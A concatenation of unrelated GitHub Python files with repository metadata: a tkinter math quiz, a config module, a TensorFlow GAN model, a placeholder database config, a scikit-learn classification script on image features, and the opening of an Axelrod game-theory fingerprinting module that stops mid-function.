#button = Button(root, text="test", command=lambda:[funct1(),funct2()])
self.newp.place(y=300, x=500)
self.Font_Tuple7 = ("helvetica", 16, "bold")
self.newp.configure(font= self.Font_Tuple7)
self.home = Button(self.f4, text="HOME", width=16, height=3, command=lambda: [self.difficultypage(), self.write()])#command=self.difficultypage
self.home.place(y=300, x=50)
self.Font_Tuple8 = ("helvetica", 16, "bold")
self.home.configure(font= self.Font_Tuple8)
########################################################################## Medium questions page ##########################################################################
def mediumqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_med)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt2(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_med = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_med)
self.nextq_med.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_med.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt2(self, solving):
global score, count
if self.solving.get() == str(self.resultmedq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_med.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_med.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
#Displays the math question by selecting two random values from the "num" list CLASS
def nextq_med(self):
self.start.destroy()
self.nextq_med.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_med.medq1update = random.choice(self.medq)
self.nextq_med.medq2update = random.choice(self.medq)
self.question = Label(text=f"{self.nextq_med.medq1update}-{self.nextq_med.medq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resultmedq(self):
self.question.destroy()
self.nextq_med
return self.nextq_med.medq1update - self.nextq_med.medq2update
########################################################################## Hard questions page ##########################################################################
def hardqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_hard)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_hard = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_hard)
self.nextq_hard.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_hard.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt(self, solving):
global score, count
if self.solving.get() == str(self.resulthardq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_hard.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_hard.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
#Displays the math question by selecting two random values from the "num" list CLASS
def nextq_hard(self):
self.start.destroy()
self.nextq_hard.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_hard.hardq1update = random.choice(self.hardq)
self.nextq_hard.hardq2update = random.choice(self.hardq)
self.question = Label(text=f"{self.nextq_hard.hardq1update}×{self.nextq_hard.hardq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resulthardq(self):
self.question.destroy()
self.nextq_hard
return self.nextq_hard.hardq1update * self.nextq_hard.hardq2update
# Launch the first screen and enter the Tk event loop.
interface()
root.resizable(False,False)
root.mainloop()
| [
"noreply@github.com"
] | ashlynraj26.noreply@github.com |
b201ed102dbba5b1f3a1d5d8a49ed4c72aa5e772 | 54051a303f9c492075f7351efc3c67484aef9919 | /modad/config.py | eda1d973cfec4f2733516f6a6b0b7f4b0616e2cb | [] | no_license | jessielaf/modad | ee6048bb6a66e00b827651d72d34388d3b238475 | 4f03f0e46a8f85b1475653e206fba48569e05a83 | refs/heads/master | 2021-06-21T09:20:03.826747 | 2019-08-22T14:21:13 | 2019-08-22T14:21:13 | 200,662,089 | 0 | 0 | null | 2021-03-25T22:50:41 | 2019-08-05T13:35:54 | Python | UTF-8 | Python | false | false | 795 | py | from typing import Union, List
from dataclasses import dataclass
@dataclass
class Destination:
    """A single src -> dest mapping used when a module has multiple destinations.

    Args:
        src (str): The source path of the files inside the module.
        dest (str): The destination path inside the project.
    """

    src: str
    dest: str
@dataclass
class Module:
    """A git-hosted module to be assembled into the project.

    Args:
        name (str): The name of the module.
        repo (str): Repository URL where the module is located.
        version (str): Branch/tag/commit of the repository to clone.
            Defaults to ``master``.
    """

    name: str
    repo: str
    version: str = "master"
class _Config:
    """The runtime configuration of modad.

    Used as a singleton via the module-level ``config`` instance below.

    Attributes:
        dest: Either a single destination path or a list of
            :class:`Destination` mappings.
        modules: The :class:`Module` entries to assemble.
    """

    dest: Union[str, List[Destination]]
    modules: List[Module]

    def __init__(self):
        # Fix: ``modules`` was a mutable *class* attribute default
        # (``modules: List[Module] = []``), which would be shared by all
        # instances.  Give each instance its own list instead.
        self.modules = []


config = _Config()
| [
"jessielaff@live.nl"
] | jessielaff@live.nl |
da38ce5115caa556d48c8c4b93baac1b3dd57215 | 709d07aaa5af1f3f3728b33ca471f6237e4c8306 | /aacnn.py | 4976b0e928f2528240a4dd998d0f3c824e4b4f61 | [] | no_license | ankushjain01/AACNN-master | 362ac3d21357d88e7287a5fa59f556bdf7628def | 0fe6b85d022852a9fdc1995c21bdf3137f74fb1d | refs/heads/master | 2020-09-28T07:09:29.448814 | 2019-12-08T19:40:25 | 2019-12-08T19:40:25 | 226,720,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,396 | py | import os
import tensorflow as tf
from generator import Generator
from discriminator import Discriminator
class AACNN():
"""AACNN model.
"""
def __init__(self, sess, FLAGS):
"""Initialization.
Args:
sess: TensorFlow session
FLAGS: flags object
"""
# initialize variables
self.sess = sess
self.f = FLAGS
self.l2_weight = FLAGS.l2_weight
self.global_step_g = tf.Variable(0, trainable=False)
self.global_step_d = tf.Variable(0, trainable=False)
# inputs: real (training) images
images_shape = [self.f.output_size_height, self.f.output_size_wight, self.f.c_dim]
attributes_shape = [self.f.attribute_size]
# self.real_images = tf.placeholder(tf.float32, [None] + images_shape, name="real_images")
# inputs: HR images
self.input = tf.placeholder(tf.float32, [self.f.batch_size] + images_shape, name="input")
self.input_attribute = tf.placeholder(tf.float32, [self.f.batch_size] + attributes_shape, name="input_attribute")
# initialize models
generator = Generator(FLAGS)
discriminator = Discriminator(FLAGS)
# generator network
self.G = generator(self.input, self.input_attribute)
if self.f.with_gan:
# discriminator network for real images
self.D_real, self.D_real_logits = discriminator(self.input)
# discriminator network for fake images
self.D_fake, self.D_fake_logits = discriminator(self.G, reuse=True)
# losses
self.d_loss_real = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_real_logits,
labels=tf.ones_like(self.D_real))
)
self.d_loss_fake = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_fake_logits,
labels=tf.zeros_like(self.D_fake))
)
self.d_loss = self.d_loss_real + self.d_loss_fake
self.g_loss_adv = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_fake_logits,
labels=tf.ones_like(self.D_fake))
)
else:
self.l2_weight = 1
self.g_loss_l2 = tf.losses.mean_squared_error(
self.input,
self.G,
weights=self.l2_weight,
scope=None
)
if self.f.with_gan:
self.g_loss = self.g_loss_l2 + self.g_loss_adv
else:
self.g_loss = self.g_loss_l2
# create summaries
self.__create_summaries()
# organize variables
t_vars = tf.trainable_variables()
if self.f.with_gan:
self.d_vars = [var for var in t_vars if "d/" in var.name]
self.g_vars = [var for var in t_vars if "g/" in var.name]
#print self.g_vars
# saver
self.saver = tf.train.Saver()
def save(self, step):
"""Save model.
Postconditions:
checkpoint directory is created if not found
checkpoint directory is updated with new saved model
Args:
step: step of training to save
"""
model_name = "AACNN.model"
model_dir = self.get_model_dir()
checkpoint_dir = os.path.join(self.f.checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
model_file_prefix = model_dir
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_file_prefix),
global_step=step)
def checkpoint_exists(self):
"""Check if any checkpoints exist.
Returns:
True if any checkpoints exist
"""
model_dir = self.get_model_dir()
checkpoint_dir = os.path.join(self.f.checkpoint_dir, model_dir)
return os.path.exists(checkpoint_dir)
def load(self):
    """Restore the most recent checkpoint into the session.

    Returns:
        True when a checkpoint was found and restored, False otherwise.
    """
    checkpoint_dir = os.path.join(self.f.checkpoint_dir, self.get_model_dir())
    ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
    if not (ckpt and ckpt.model_checkpoint_path):
        return False
    latest = os.path.basename(ckpt.model_checkpoint_path)
    self.saver.restore(self.sess, os.path.join(checkpoint_dir, latest))
    return True
def get_model_dir(self):
    """Build the per-run model directory name from the configuration.

    Returns:
        String "<experiment>_<dataset>_<batch>_<width>_<height>".
    """
    parts = (self.f.experiment_name,
             self.f.dataset,
             self.f.batch_size,
             self.f.output_size_wight,
             self.f.output_size_height)
    return "_".join(str(part) for part in parts)
def __create_summaries(self):
    """Create TensorBoard summaries for images, histograms and losses."""
    # Image summaries: generated samples next to the real inputs.
    self.g_sum = tf.summary.image("generated", self.G, max_outputs=8)
    self.real_sum = tf.summary.image("real", self.input, max_outputs=8)
    if self.f.with_gan:
        # Discriminator output histograms (real vs. fake batches).
        self.d_real_sum = tf.summary.histogram("d/output/real", self.D_real)
        self.d_fake_sum = tf.summary.histogram("d/output/fake", self.D_fake)
        # Discriminator loss scalars.
        self.d_loss_real_sum = tf.summary.scalar("d/loss/real", self.d_loss_real)
        self.d_loss_fake_sum = tf.summary.scalar("d/loss/fake", self.d_loss_fake)
        self.d_loss_sum = tf.summary.scalar("d/loss/combined", self.d_loss)
    # Generator loss is logged whether or not the GAN branch is active.
    self.g_loss_sum = tf.summary.scalar("g/loss/combined", self.g_loss)
| [
"noreply@github.com"
] | ankushjain01.noreply@github.com |
a17fa25a10e0649ff9326dc7dc05bcb5e574619b | e02e463ca47e8d5fce6b60040333afad875558fc | /config_sample.py | 5d4e9f564f8e3322a727814b45bf7a52b0de7eb0 | [] | no_license | akarimyar/Infra_Automation | 0d7c4db2868a27596132f6d653050513ec49bc7e | f29920571fad93bae7802df7837c8c2387bb15de | refs/heads/master | 2020-07-24T10:36:21.070233 | 2019-09-23T16:18:37 | 2019-09-23T16:18:37 | 207,896,253 | 1 | 1 | null | 2019-09-23T16:18:38 | 2019-09-11T20:00:51 | Python | UTF-8 | Python | false | false | 168 | py | db_connection_settings = {
'user': '<username>',
'password': '<password>',
'host': '<localhost>',
'database': '<db_name>',
'port': '<port_number>'
} | [
"sjogdeo@mercycorps.org"
] | sjogdeo@mercycorps.org |
4dfb9fa5aa37bfc7fc199c580f57e36c5f93bf39 | f75a82be973ab175459bf7571c38ab362a65dd88 | /30_Python/classification/VT_20141030_EvryOriginales_entropie.py | 45435d3c9daa17a407f0ce8d08bc1ded2273430f | [] | no_license | nabil67/Bio_Python | fe7c5869533883d23762110861ce110dbd7e6dee | 61e34604a0345b4542a6876f6cabd372cec08f8d | refs/heads/master | 2020-05-03T23:05:31.238528 | 2019-04-10T09:39:27 | 2019-04-10T09:39:27 | 178,857,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,539 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 18 10:39:01 2016
@author: nabil.belahrach
# -*- coding: utf-8 -*-
Éditeur de Spyder
Ceci est un script temporaire.
"""
import numpy as np
import pandas as pd
import matplotlib.pylab as plt
from sklearn.cross_validation import train_test_split
from sklearn import preprocessing
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import GridSearchCV
#from mpl_toolkits.mplot3d import Axes3D
from sklearn import svm
from sklearn.metrics import classification_report
#from sklearn.decomposition import PCA
#import statsmodels.api as sm
from sklearn import metrics
from sklearn import linear_model
from sklearn import cross_validation
from sklearn import ensemble
from sklearn import neighbors
from sklearn import tree
import seaborn as sns
plt.style.use('ggplot')
#plt.style.use('fivethirtyeight') # Good looking plots
#pd.set_option('display.max_columns', None)
from Mesfonctions import *
# Load the raw feature export: column 1 is the class label, the remaining
# selected columns are per-object image statistics (mean, std, median,
# entropy, uniformity, area, eccentricity).
df = pd.read_csv("U:/Stagiaires/Nabil.BELAHRACH/Donnees/20_brut/VT_20141030_EvryOriginales_entropie.csv",
                 sep=";", header = False,usecols=[1,14,15,16,19,20,21,26],
                 names = ['classe','moyenne','ecart-type','mediane','entropie','uniformit','surface','eccentricity' ])
print df.head()
# NOTE(review): the expression below is evaluated but its result is
# discarded (only useful when run interactively).
df.shape
#==============================================================================
"""---------------------------Préparation des données ------------------ """
#==============================================================================
# The CSV uses French decimal commas; convert them to dots so the columns
# can be cast to float below.
df['moyenne']=df['moyenne'].str.replace("," , ".")
df['entropie']=df['entropie'].str.replace("," , ".")
df['eccentricity']=df['eccentricity'].str.replace("," , ".")
df['uniformit']=df['uniformit'].str.replace("," , ".")
df['ecart-type']=df['ecart-type'].str.replace("," , ".")
# Treat the label column as a categorical variable.
df["classe"] =pd.Categorical(df["classe"])
cl = pd.CategoricalIndex(df["classe"]).categories
df[['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']] = df[['moyenne','ecart-type',
        'mediane','surface','entropie','uniformit','eccentricity']].astype(float)
# Rename the raw categories to c1..c6, then put them in natural order.
df["classe"] = df["classe"].cat.rename_categories(["c2","c3","c6","c4","c5","c1"])
df["classe"] = df.classe.cat.reorder_categories(["c1","c2","c3","c4","c5","c6"])
#df2 = df[['classe', 'uniformit','surface','eccentricity']]
#df.to_csv('U:/Stagiaires/Nabil.BELAHRACH/Donnees/20_brut/myFile_entropie.csv', sep = ';')
#==============================================================================
"""---------------------- X, y -------------------------------------------- """
#==============================================================================
# Feature matrix X and label vector y; the features are standardised
# (zero mean, unit variance) before any distance-based modelling.
X = (df[:][['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']]).values
#X = (df[:][['surface','uniformit','eccentricity']]).values
Y = (df[:][['classe']]).values
y= Y.ravel()
#df.classe.value_counts()
scaler= preprocessing.StandardScaler().fit(X)
X = scaler.transform(X)
#==============================================================================
""" ------------------------ Classification KNN --------------------------- """
#==============================================================================
""" ------center et réduire les variables explicatives ! -----------"""
#polynomial_features = preprocessing.PolynomialFeatures()
#X = polynomial_features.fit_transform(X)
# Hold out 25% of the data for testing.
X_train,X_test,Y_train,Y_test = train_test_split( X, y,
                                test_size= 0.25,random_state=33)
# training: grid-search the number of neighbours with 10-fold CV
param = [{"n_neighbors": list(range(1,15))}]
knn = GridSearchCV(KNeighborsClassifier(), param, cv=10, n_jobs= -1)
digit_knn = knn.fit(X_train, Y_train)
print ("le best param = "), digit_knn.best_params_["n_neighbors"]
pass # best param = 9
""" ------on relance le modèle avec le best-paramètre -----------"""
# NOTE(review): this fresh KNeighborsClassifier is never fitted -- the
# scoring and prediction below still go through the fitted grid-search
# object ``digit_knn``, so this assignment currently has no effect.
knn = KNeighborsClassifier(n_neighbors= digit_knn.best_params_["n_neighbors"])
digit_knn.score(X_train,Y_train) # error estimate = 55%
Y_pred = digit_knn.predict(X_test) # predict the responses for X_test
table = pd.crosstab( Y_test, Y_pred) # confusion matrix
print table;
print classification_report( Y_test, Y_pred)
def Acccuracy3diag(table):
    """Fraction of observations on or adjacent to the confusion-matrix
    diagonal, i.e. the share of predictions at most one class away from
    the true class.

    Args:
        table: confusion matrix as a pandas DataFrame (e.g. ``pd.crosstab``).

    Returns:
        float in [0, 1].
    """
    mat = table.values
    # Sum the three central diagonals (offsets -1, 0 and +1).
    near_diag = sum(np.trace(mat, offset=off) for off in (-1, 0, 1))
    # float() keeps true division under Python 2 (this script uses py2 prints).
    return float(near_diag) / mat.sum()
# Share of predictions within one class of the truth.
# NOTE(review): the value is computed but neither stored nor printed.
Acccuracy3diag(table)
plt.matshow(table)
plt.title("Matrice de Confusion du knn 3c") # not great
plt.colorbar()
plt.show()
#==============================================================================
"""------------ cross_validation.StratifiedKFold -------------- """
#==============================================================================
def stratified_cv(X, Y, clf_class, shuffle=True, n_folds=10, **kwargs):
    """Out-of-fold predictions from stratified k-fold cross-validation.

    A fresh ``clf_class(**kwargs)`` model is trained on each training fold
    and used to predict the held-out fold, so every sample receives exactly
    one prediction from a model that never saw it.

    Returns:
        Array of predicted labels aligned with ``Y``.
    """
    folds = cross_validation.StratifiedKFold(Y, n_folds=n_folds, shuffle=shuffle)
    predicted = Y.copy()
    for train_idx, test_idx in folds:
        model = clf_class(**kwargs)
        model.fit(X[train_idx], Y[train_idx])
        predicted[test_idx] = model.predict(X[test_idx])
    return predicted
"""------------------ accuracy --------------------------------------------- """
print('Passive Aggressive Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))))
print('Gradient Boosting Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))))
print('Support vector machine(SVM): {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, svm.SVC))))
print('Random Forest Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, ensemble.RandomForestClassifier))))
print('K Nearest Neighbor Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))))
print('Logistic Regression: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, linear_model.LogisticRegression))))
"""--------------- precision, recall, f1-score -------------- """
print('Passive Aggressive Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))));
print('Gradient Boosting Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))));
print('Support vector machine(SVM):\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, svm.SVC))));
print('Random Forest Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, ensemble.RandomForestClassifier))));
print('K Nearest Neighbor Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))));
print('Logistic Regression:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, linear_model.LogisticRegression))));
#print('Dump Classifier:\n {}\n'.format(metrics.classification_report(y, [0 for ii in y.tolist()]))); # ignore the warning as they are all 0
pass
#==============================================================================
"""----------------------- features importances ------------------------- """
#==============================================================================
"""--------------- selection de variables Grad_Bossiting -------------- """
gbc = ensemble.GradientBoostingClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_GBoosting_5c.png')
plt.show()
"""--------------- selection de variables adaboost -------------- """
gbc = ensemble.AdaBoostClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_AdaBoost_5c.png')
plt.show()
"""--------------- selection de variables adaboost -------------- """
gbc = ensemble.RandomForestClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_RandomForestClassifier.png')
plt.show()
#==============================================================================
"""---------------------matrix de confusion-------------------------------- """
#==============================================================================
# Cross-validated confusion matrix for each classifier in the panel.
pass_agg_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))
grad_ens_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))
decision_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, tree.DecisionTreeClassifier))
ridge_clf_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.RidgeClassifier))
svm_svc_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, svm.SVC))
random_forest_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, ensemble.RandomForestClassifier))
k_neighbors_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))
logistic_reg_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.LogisticRegression))
#dumb_conf_matrix = metrics.confusion_matrix(y, [0 for ii in y.tolist()]); # ignore the warning as they are all 0
# Map subplot position (1-8) -> matrix and title for the 3x3 grid below.
conf_matrix = {
                1: {
                    'matrix': pass_agg_conf_matrix,
                    'title': 'Passive Aggressive',
                   },
                2: {
                    'matrix': grad_ens_conf_matrix,
                    'title': 'Gradient Boosting',
                   },
                3: {
                    'matrix': decision_conf_matrix,
                    'title': 'Decision Tree',
                   },
                4: {
                    'matrix': ridge_clf_conf_matrix,
                    'title': 'Ridge',
                   },
                5: {
                    'matrix': svm_svc_conf_matrix,
                    'title': 'Support Vector Machine',
                   },
                6: {
                    'matrix': random_forest_conf_matrix,
                    'title': 'Random Forest',
                   },
                7: {
                    'matrix': k_neighbors_conf_matrix,
                    'title': 'K Nearest Neighbors',
                   },
                8: {
                    'matrix': logistic_reg_conf_matrix,
                    'title': 'Logistic Regression',
# entry 9 (the "Dumb" baseline) is disabled along with its matrix above
#                   }
#                9: {
#                    'matrix': dumb_conf_matrix,
#                    'title': 'Dumb',
                   },
}
fix, ax = plt.subplots(figsize=(16, 12))
plt.suptitle('Confusion Matrix of Various Classifiers')
for ii, values in conf_matrix.items():
    matrix = values['matrix']
    title = values['title']
    plt.subplot(3, 3, ii) # starts from 1
    plt.title(title);
    sns.heatmap(matrix, annot=True, fmt='');
    # NOTE(review): savefig inside the loop rewrites the same file each
    # iteration; only the final, fully-drawn figure is kept.
    plt.savefig('Confusion_Matrix_VC_5c.png')
plt.show()
#==============================================================================
"""------------------------ c4 == c5 ----------------------------"""
#==============================================================================
# Merge classes c4 and c5 into a single label ("classe5") to build a
# 5-class version of the problem.
g1=df[df.classe == "c1"]
g2=df[df.classe == "c2"]
g3=df[df.classe == "c3"]
g4=df[df.classe == "c4"]
g5=df[df.classe == "c5"]
g6=df[df.classe == "c6"]
try:
    # c5 rows receive the c4 label; every other group keeps its own label.
    g1["classe5"]="c1"
    g2["classe5"]="c2"
    g3["classe5"]="c3"
    g4["classe5"]="c4"
    g5["classe5"]="c4"
    g6["classe5"]="c6"
# NOTE(review): this bare except silently swallows *any* error; it was
# presumably added to mute pandas chained-assignment warnings, but it would
# also hide genuine failures -- confirm before relying on it.
except:
    pass
newData =pd.concat([g1,g2,g3,g4,g5,g6],axis=0,ignore_index=True)
X = (newData[:][['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']]).values
Y = (newData[:][['classe5']]).values
y = Y.ravel()
# Re-standardise the features for the merged data set.
scaler= preprocessing.StandardScaler().fit(X)
X = scaler.transform(X)
#==============================================================================
""" ----------------------- VotingClassifier--------------------------------"""
#==============================================================================
from sklearn.ensemble import VotingClassifier

# Compare three base classifiers against a hard-voting ensemble of them.
# Fix: the original referenced bare ``LogisticRegression`` and
# ``RandomForestClassifier``, which are never imported in this script (only
# the ``linear_model`` / ``ensemble`` sub-modules are) and would raise
# NameError at runtime.
clf1 = linear_model.LogisticRegression(random_state=1)
clf2 = ensemble.RandomForestClassifier(random_state=1)
clf3 = svm.SVC()
eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
for clf, label in zip([clf1, clf2, clf3, eclf], ['Logistic Regression', 'Random Forest', 'SVM', 'Ensemble']):
    scores = cross_validation.cross_val_score(clf, X, y, cv=10, scoring='accuracy')
    print("Accuracy: %0.2f (+/- %0.2f) [%s]" % (scores.mean(), scores.std(), label))
# Fix: removed the stray trailing ``sklearn.ensemble()`` call -- ``sklearn``
# itself is never imported here, and a module object is not callable.
| [
"nabil.belahrach@gmail.com"
] | nabil.belahrach@gmail.com |
fe3fb3bdcd9617b9dc840ffe4433e177cc9b8180 | 208c6c02b66d9b99f599e2bd9bd254aba1a06158 | /fingerprint.py | bc2b4d27ca1db214b61768782e48209e0f429a8e | [] | no_license | theref/FinalYearProject-Code | 85b7c82d186d583c94b61a031aacc1bc2916a8b3 | e18c6e5af4dc76e6f6429521218d2681304f6272 | refs/heads/master | 2023-09-01T09:41:39.328534 | 2016-11-04T10:04:22 | 2016-11-04T10:04:22 | 69,358,389 | 0 | 0 | null | 2023-08-22T10:07:36 | 2016-09-27T13:16:50 | Python | UTF-8 | Python | false | false | 9,521 | py | from functools import partial
import matplotlib.pyplot as plt
import seaborn as sns
from multiprocessing import Pool
from itertools import product
import numpy as np
from collections import defaultdict
import axelrod as axl
from axelrod.strategy_transformers import MixedTransformer, dual
from axelrod.interaction_utils import compute_final_score_per_turn as cfspt
from axelrod.interaction_utils import compute_normalised_state_distribution as cnsd
states = [('C', 'C'), ('C', 'D'), ('D', 'C'), ('D', 'D')]
def expected_value(fingerprint_strat, probe_strat, turns, repetitions=50,
warmup=0, start_seed=0, coords=None):
"""
Calculate the expected score for a strategy and probe strategy for (x, y)
"""
strategies = [axl.Cooperator, axl.Defector]
probe_strategy = MixedTransformer(coords, strategies)(probe_strat)
players = (fingerprint_strat, probe_strategy())
scores = []
distribution = defaultdict(int) # If you access the defaultdict using a key, and the key is
# not already in the defaultdict, the key is automatically added
# with a default value. (stackoverflow)
for seed in range(start_seed, start_seed + repetitions): # Repeat to deal with expectation
axl.seed(seed)
match = axl.Match(players, turns) # Need to create a new match because of caching
match.play()
interactions = match.result[warmup:]
scores.append(cfspt(interactions)[0]) # compute_final_score_per_turn
match_distribution = cnsd(interactions) # compute_normalised_state_distribution
for st in states:
distribution[st] += match_distribution[st]
factor = 1.0 / sum(distribution.values())
for k in distribution: # normalize the new dictionary
distribution[k] = distribution[k] * factor
mean_score = np.mean(scores)
return coords, mean_score, distribution
def get_coordinates(granularity):
    """Build the fingerprint grid over [0, 1) x [0, 1).

    Returns:
        (dual_coords, original_coords): points with x + y > 1 probe the
        dual strategy; points with x + y <= 1 probe the strategy itself.
    """
    axis = np.arange(0, 1, granularity)
    grid = [(a, b) for a in axis for b in axis]
    originals = [pt for pt in grid if pt[0] + pt[1] <= 1]
    duals = [pt for pt in grid if pt[0] + pt[1] > 1]
    return duals, originals
def get_results(fingerprint_strat, probe_strat, granularity, cores,
                turns=50, repetitions=10, warmup=0, start_seed=0):
    """Run the fingerprint simulations over the whole coordinate grid.

    Coordinates with x + y <= 1 probe the strategy itself; the remaining
    coordinates probe its dual.  Each half is evaluated over a process
    pool and the combined results are returned sorted by coordinate.
    """
    dual_coords, original_coords = get_coordinates(granularity)

    original_pool = Pool(cores)
